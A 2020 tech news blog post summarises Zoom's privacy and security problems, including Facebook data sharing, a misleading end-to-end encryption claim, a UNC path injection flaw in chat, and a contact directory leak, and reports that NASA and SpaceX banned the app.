Multiple privacy weaknesses found in Zoom - NASA and SpaceX ban use

Posted on Thursday, April 02 2020 @ 12:32 CEST by Thomas De Maesschalck
With millions simultaneously working from home due to the coronavirus pandemic, there's been a massive increase in usage of video conferencing services like Google Hangouts, Microsoft Team and Zoom. Unfortunately, the latter has found itself in hot water as there are various privacy issues.

The Tech Report has an overview over here. First up, there was a report that the Zoom iOS app send user data to Facebook, without even complying with Facebook's terms of service. That data sharing has now been stopped.

Next, there's controversy about Zoom's claim that it offers end-to-end (E2E) encryption. After soe scrutiny, Zoom admitted that it's currently not possible to enable E2E encryption for Zoom video meetings. As things stand right now, Zoom can see the contents of your video calls:
This usage of the term “end-to-end” is misleading because, as The Intercept points out, the supposed “end points” sit between the Zoom clients. The “ends” in E2E encryption are supposed to be the clients. While it is true that Zoom uses standard TLS to encrypt information sent between clients and the Zoom server, Zoom holds the key to decrypt this information once it reaches its servers, meaning Zoom can see the contents of your video calls. True E2E encryption necessitates that the service provider, Zoom in this case, does not hold the encryption key. The only feature of Zoom with true E2E encryption available is its text chat.
Then there's a security issue. Security researcher @_g0dmode discovered that Zoom's text chat is vulnerable to UNC path injection attack. This could give an attacker access to your Windows login credentials.

Finally, Zoom's "company directory" exposes names, e-mail addresses and profile photos of those who subscribe to the service with a non-standard e-mail provider:
Unfortunately, this feature seems to extent to those using non-standard email providers, as the feature simply checks the domain name in your email address against a blacklist of email providers maintained by Zoom. If your email provider’s domain name does not appear in this blacklist, the email addresses, profile pictures, and status of all other users of that email provider who are subscribed to Zoom will appear in your contact list.
In response to these privacy and security concerns, some organizations like SpaceX and NASA have already forbidden employees to keep using Zoom.

About the Author

Thomas De Maesschalck

Thomas has been messing with computer since early childhood and firmly believes the Internet is the best thing since sliced bread. Enjoys playing with new tech, is fascinated by science, and passionate about financial markets. When not behind a computer, he can be found with running shoes on or lifting heavy weights in the weight room.


Loading Comments

Share this story!

Latest news

Latest reviews